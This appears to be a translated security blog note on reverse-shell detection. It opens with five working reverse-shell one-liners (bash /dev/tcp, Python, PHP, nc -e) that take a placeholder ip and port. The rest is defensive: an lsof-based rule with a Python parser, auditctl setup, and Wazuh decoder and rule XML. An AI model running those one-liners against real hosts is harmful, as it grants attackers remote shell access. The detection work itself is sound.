Common reverse shells:
bash -i >& /dev/tcp/ip/port 0>&1
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
php -r 'exec("bash -i >& /dev/tcp/ip/port 0>&1");'
php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'
nc -e /bin/bash ip port
Test screenshots:
nc:
bash:
How it works: in short, the controlled host initiates a connection to a port on which the controlling host is listening, and redirects its command line's input and output over that connection, so the usual client and server roles are reversed.
References:
https://www.freebuf.com/articles/system/187584.html
https://cloud.tencent.com/developer/article/1527568
https://xz.aliyun.com/t/2548 (in-depth look at the principle)
https://www.cnblogs.com/ginvip/p/6350222.html (explanation of file descriptors, FD)
Rule design: if a bash process has a remote socket but no tty, treat it as a reverse shell.
1. Find the /bin/bash processes (ps -ef | grep bash)
2. Run lsof -p $pid
3. Walk through the lsof output:
   when TYPE contains CHR and NAME matches (tty|pts|ptmx), the process has a terminal
   when TYPE contains 'IP' and the line contains the keyword 'ESTABLISHED', extract the controller's IP, i.e. the address between -> and :, with the regex (?<=->)((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})(\.((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})){3}(?=:)
   when FD is 'cwd', show that line's NAME
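As an added example (not code from the original post), the script below applies this rule to the text of lsof -p <pid>, using the page's own regex; it is also the script that step 3 of the Wazuh section below says is needed. The two lsof outputs are constructed samples, and the 9-column lsof layout is an assumption.

```python
import re

# Regex from the page: the controller's IP, i.e. the address between "->" and ":" in lsof's NAME column (IPv4 only).
REMOTE_IP = re.compile(
    r"(?<=->)((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})(\.((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})){3}(?=:)")
TTY_NAME = re.compile(r"tty|pts|ptmx")


def analyze_lsof(lsof_output):
    """Apply the rule to the text of `lsof -p <pid>` for one bash process.

    Verdict: an ESTABLISHED remote socket but no tty/pts on the process
    means a suspected reverse shell. Assumes lsof's default 9-column layout.
    """
    has_tty, remote_ips, cwd = False, set(), None
    for line in lsof_output.splitlines()[1:]:  # skip the header
        fields = line.split(None, 8)  # NAME is the 9th column and may contain spaces
        if len(fields) < 9:
            continue
        fd, ftype, name = fields[3], fields[4], fields[8]
        if "CHR" in ftype and TTY_NAME.search(name):
            has_tty = True  # a descriptor bound to a real terminal
        elif "IP" in ftype and "ESTABLISHED" in name:
            m = REMOTE_IP.search(name)
            if m:
                remote_ips.add(m.group(0))
        elif fd == "cwd":
            cwd = name  # where the shell was started
    return {"has_tty": has_tty, "remote_ips": sorted(remote_ips), "cwd": cwd,
            "suspicious": bool(remote_ips) and not has_tty}


# Constructed sample: bash -i whose fds 0/1/2 were dup'ed onto a TCP socket, no terminal.
REVERSE_SHELL_LSOF = """\
COMMAND  PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
bash    4242 root  cwd    DIR  253,0     4096    2 /tmp
bash    4242 root    0u  IPv4  51234      0t0  TCP 10.0.0.5:40212->192.168.1.20:4444 (ESTABLISHED)
bash    4242 root    1u  IPv4  51234      0t0  TCP 10.0.0.5:40212->192.168.1.20:4444 (ESTABLISHED)
bash    4242 root    2u  IPv4  51234      0t0  TCP 10.0.0.5:40212->192.168.1.20:4444 (ESTABLISHED)
"""

# Constructed sample: an ordinary interactive bash attached to a pseudo-terminal.
INTERACTIVE_LSOF = """\
COMMAND  PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
bash    1337 user  cwd    DIR  253,0     4096    2 /home/user
bash    1337 user    0u   CHR  136,1      0t0    4 /dev/pts/1
bash    1337 user    1u   CHR  136,1      0t0    4 /dev/pts/1
bash    1337 user    2u   CHR  136,1      0t0    4 /dev/pts/1
"""
```

Feed it the output of lsof -p for each PID found in step 1; like the page's regex, it only recognises IPv4 peers.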
Wazuh configuration
1. Configure an audit alert for execution of /bin/bash; on the agent:
auditctl -w /bin/bash -p x -F key=audit-wazuh-c
2. Wazuh alert
rule.id: 80792
3. Adjust the rule based on the audit content. However, Wazuh raises alerts only on the basis of logs, so a rule cannot trigger a command execution; the following detection can only be done by a script:
    exe="/bin/bash" + type=EXECVE + contains "-i"
    run lsof -p $pid
    check whether TYPE contains 'IP' and the line contains the keyword 'ESTABLISHED', and extract the controller's IP, i.e. the address between -> and :, with the regex (?<=->)((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})(\.((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})){3}(?=:)
4. Decide based on port and process
On the client, configure monitoring of /bin/bash: auditctl -w /bin/bash -p x -F key=audit-wazuh-c
Configure the command to run: netstat -antlp | grep ESTABLISHED | egrep '/(bash|sh)' (rule.id=100005)
When 100005 and 80792 occur together, a reverse shell is present: alert 100006
agent.conf:
<agent_config>
    <wodle name="command">
        <disabled>no</disabled>
        <tag>reverse shell test</tag>
        <!-- check whether there is an established remote connection owned by a process named bash or sh -->
        <command>netstat -antlp | grep ESTABLISHED | egrep '/(bash|sh)'</command>
        <interval>5s</interval>
        <ignore_output>no</ignore_output>
        <run_on_start>yes</run_on_start>
        <timeout>0</timeout>
    </wodle>
</agent_config>
decoders.xml:
<decoder name="check_reverse_shell">
    <prematch>^tcp</prematch>
</decoder>
<!-- Wazuh uses its own regex syntax (OS_Regex), which differs from PCRE; follow
     https://documentation.wazuh.com/3.10/user-manual/ruleset/ruleset-xml-syntax/regex.html#os-regex-or-regex-syntax strictly -->
<decoder name="check_reverse_shell_info">
    <parent>check_reverse_shell</parent>
    <!-- the first numeric column of netstat -antlp is Recv-Q -->
    <regex offset="after_parent">\s*(\d+)\s*</regex>
    <order>recv_q</order>
</decoder>
<decoder name="check_reverse_shell_info">
    <parent>check_reverse_shell</parent>
    <regex offset="after_regex">\s*(\d+\p\d+\p\d+\p\d+)</regex>
    <order>srcip</order>
</decoder>
<decoder name="check_reverse_shell_info">
    <parent>check_reverse_shell</parent>
    <regex offset="after_regex">\p(\d+)</regex>
    <order>srcport</order>
</decoder>
<decoder name="check_reverse_shell_info">
    <parent>check_reverse_shell</parent>
    <regex offset="after_regex">\s*(\d+\p\d+\p\d+\p\d+)</regex>
    <order>dstip</order>
</decoder>
<decoder name="check_reverse_shell_info">
    <parent>check_reverse_shell</parent>
    <regex offset="after_regex">\p(\d+)</regex>
    <order>dstport</order>
</decoder>
rule.xml:
<group name="attack,">
    <!-- This rule cannot be correlated with 80792 directly. I found no answer in the official docs or the default rules;
         my guess is that a rule with log decoding and a level configured always alerts, which conflicts with the
         if_sid precondition (a chicken-and-egg problem), so the correlation can only be done after this rule has
         matched and produced an alert. -->
    <rule id="100005" level="7">
        <decoded_as>check_reverse_shell</decoded_as>
        <match>ESTABLISHED</match>
        <regex>/bash|/sh</regex>
        <description>bash|sh netstat information</description>
    </rule>
    <rule id="100006" level="12" timeframe="10" frequency="2">
        <if_sid>100005</if_sid>
        <if_matched_sid>80792</if_matched_sid>
        <description>There could be a reverse shell. Please check.</description>
    </rule>
</group>
Alert display: